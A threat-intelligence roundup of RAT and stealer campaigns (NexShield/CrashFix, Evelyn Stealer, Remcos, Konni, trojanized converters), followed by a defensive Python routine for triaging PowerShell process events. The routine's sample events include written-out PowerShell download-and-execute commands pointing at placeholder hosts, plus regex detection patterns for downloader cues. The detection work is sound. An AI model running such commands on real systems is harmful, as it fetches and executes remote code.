Malware campaigns abusing trusted software channels (browser extensions, developer tools, and Google Ads) to deliver RATs and stealers
Multiple active malware campaigns are abusing trusted distribution channels—including Chrome/Edge extensions, Visual Studio Code extensions, and Google Ads/redirection infrastructure—to trick users into executing payloads that deliver remote access trojans (RATs) or information stealers. Huntress reported a malvertising-driven fake ad blocker extension, NexShield, that intentionally forces Chrome/Edge into a crash/DoS state by looping chrome.runtime port connections; on restart it displays a fake “security warning” and uses a ClickFix-style social engineering flow (“CrashFix”) to push users to paste and run clipboard-copied commands that trigger an obfuscated PowerShell download-and-execute chain, ultimately deploying the Python-based ModeloRAT in corporate environments. Separately, Trend Micro described Evelyn Stealer delivered via a trojanized Visual Studio Code extension that drops a malicious Lightshot.dll side-loaded by legitimate Lightshot (Lightshot.exe), then runs staged PowerShell and payload retrieval to steal browser credentials, cookies, crypto wallets, VPN/Wi‑Fi data, files, and screenshots before exfiltrating to an attacker-controlled FTP server—posing elevated risk when developer workstations are compromised.
South Korea-focused activity also features prominently across several reports, with multiple delivery vectors leading to RAT deployment. ASEC documented Remcos RAT distributed via fake installers masquerading as VeraCrypt and via gambling-related “lookup” tools, using multi-stage obfuscated VBS/PowerShell chains and enabling credential theft, keylogging, and device surveillance (webcam/mic). Genians attributed “Operation Poseidon” to the Konni APT, describing spear-phishing that abuses Google’s advertising/tracking redirection (e.g., ad.doubleclick.net parameters) to make malicious links appear legitimate, redirecting victims to compromised WordPress infrastructure hosting ZIPs with LNK files that launch AutoIt-based loaders to run an EndRAT variant in memory. Nextron Systems reported widespread trojanized “free converter” apps promoted via malicious Google ads and lookalike converter sites (e.g., ez2convertapp[.]com, convertyfileapp[.]com), with some payloads signed using abused/rotating code-signing certificates (e.g., BLUE TAKIN LTD, TAU CENTAURI LTD, SPARROW TIDE LTD) to evade trust checks while installing persistent backdoors.
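As an added defender-side example (not code from Huntress, Trend Micro, ASEC or any other report above), the routine below triages constructed process-creation events for the PowerShell download-and-execute stage that the CrashFix, Remcos (VBS stager) and Evelyn Stealer (side-loaded Lightshot.exe) chains share: a PowerShell child of an unexpected parent carrying downloader cues. The parent list, cue patterns, file paths and the example.invalid URLs are assumptions for illustration.

```python
import re
from pathlib import PureWindowsPath

# Parents from which a PowerShell download-and-execute chain is suspicious in the
# campaigns above: Explorer (the Run dialog used by the ClickFix/CrashFix flow),
# the Windows script hosts (the VBS stagers of the Remcos campaign) and the
# side-loaded Lightshot.exe of the Evelyn Stealer chain. Assumed list, extend per environment.
SUSPICIOUS_PARENTS = {"explorer.exe", "wscript.exe", "cscript.exe", "lightshot.exe"}

# Command-line cues of a staged downloader; every matching cue is reported.
CUES = {
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "in-memory exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?(?=\s)|frombase64string", re.I),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy bypass": re.compile(r"-e(p|xecutionpolicy)\s+bypass", re.I),
}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (Sysmon event 1 / 4688 style), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmd": "powershell -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
            ".DownloadString('http://cdn.example.invalid/stage2.ps1')\""},
    # QQBCAEMA is UTF-16LE "ABC", a harmless stand-in for a real encoded payload
    {"parent": r"C:\Windows\System32\wscript.exe", "image": PS, "cmd": "powershell -enc QQBCAEMA"},
    {"parent": r"C:\Users\dev\AppData\Local\Lightshot\Lightshot.exe", "image": PS,
     "cmd": "powershell -w hidden -c \"Invoke-WebRequest http://cdn.example.invalid/p.bin -OutFile p.bin\""},
    {"parent": r"C:\Program Files\Microsoft VS Code\Code.exe", "image": PS, "cmd": "powershell -NoLogo -NoExit"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": PS, "cmd": "powershell -ExecutionPolicy Bypass -File build.ps1"},
]

def score_event(event):
    """Return (suspicious_parent, matched_cues) for one process-creation event."""
    parent = PureWindowsPath(event["parent"]).name.lower()
    image = PureWindowsPath(event["image"]).name.lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return False, []
    cues = [name for name, rx in CUES.items() if rx.search(event["cmd"])]
    return parent in SUSPICIOUS_PARENTS, cues

def triage(events):
    """Keep events with a suspicious parent plus any cue, or with two or more cues."""
    flagged = []
    for ev in events:
        bad_parent, cues = score_event(ev)
        if (bad_parent and cues) or len(cues) >= 2:
            flagged.append({"parent": ev["parent"], "cmd": ev["cmd"], "cues": cues})
    return flagged
```

Running `triage(SAMPLE_EVENTS)` flags the first three events and leaves the VS Code terminal and the one-cue build script alone; the threshold is deliberately conservative so a single `-ExecutionPolicy Bypass` from a known parent does not page anyone.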

How this story unfolded
6 events from the most recent confirmed update back to the earliest known activity.
Chrome Web Store removes malicious NexShield extension
Following discovery of the campaign, the malicious NexShield extension was removed from the Chrome Web Store. Huntress warned that removing the extension alone would not necessarily eliminate payloads already delivered to infected systems.
Fake NexShield browser extension used for ClickFix and ModeloRAT delivery
A malvertising campaign pushed a fake Chrome/Edge ad-blocking extension called NexShield that intentionally crashed browsers to trigger ClickFix-style social engineering. Victims were instructed to run malicious commands, leading to an obfuscated PowerShell chain and, on domain-joined corporate systems, deployment of the Python-based ModeloRAT.
Remcos RAT campaign uses fake VeraCrypt installers in South Korea
A malware campaign targeting South Korean users distributed Remcos RAT through deceptive installers masquerading as VeraCrypt and other utilities, including lures tied to illegal online gambling platforms. The infection chain used staged VBS and PowerShell downloaders, Discord webhooks, and process injection to deliver a full-featured remote access trojan capable of credential theft and surveillance.
Threat actors weaponize VS Code extensions to deploy Evelyn Stealer
Trend Micro reported a multistage malware campaign in which trojanized Visual Studio Code extensions compromised developer workstations. The attack used a fake DLL sideloading chain and PowerShell downloaders to deploy Evelyn Stealer, which exfiltrated credentials, tokens, crypto wallets, messaging sessions, and other sensitive data to attacker-controlled infrastructure.
Malicious converter apps spread via Google ads and fake websites
Nextron Systems reported a widespread malware campaign distributing trojanized file converter applications through deceptive Google advertisements and fake converter sites. The apps performed real conversion functions while covertly installing persistent RAT malware using code-signed binaries and scheduled tasks for follow-on payload delivery.
Konni APT runs Operation Poseidon against South Korean organizations
A spear-phishing campaign dubbed Operation Poseidon targeted South Korean organizations with lures themed around North Korean human rights groups and financial institutions. The activity was attributed to the Konni APT group and used Google ad click-tracking redirects, compromised WordPress sites, ZIP archives, LNK files, and AutoIt scripts to load an EndRAT variant in memory.
Sources
Fake ad blocker extension crashes the browser for ClickFix attacks (bleepingcomputer.com)
Remcos RAT Masquerade as VeraCrypt Installers Steals Users Login Credentials (cybersecuritynews.com)
Threat Actors Weaponizing Visual Studio Code to Deploy a Multistage Malware (cybersecuritynews.com)
New Spear-Phishing Attack Abusing Google Ads to Deliver EndRAT Malware (cybersecuritynews.com)
Free Converter Apps that Convert your Clean System to Infected in Seconds (cybersecuritynews.com)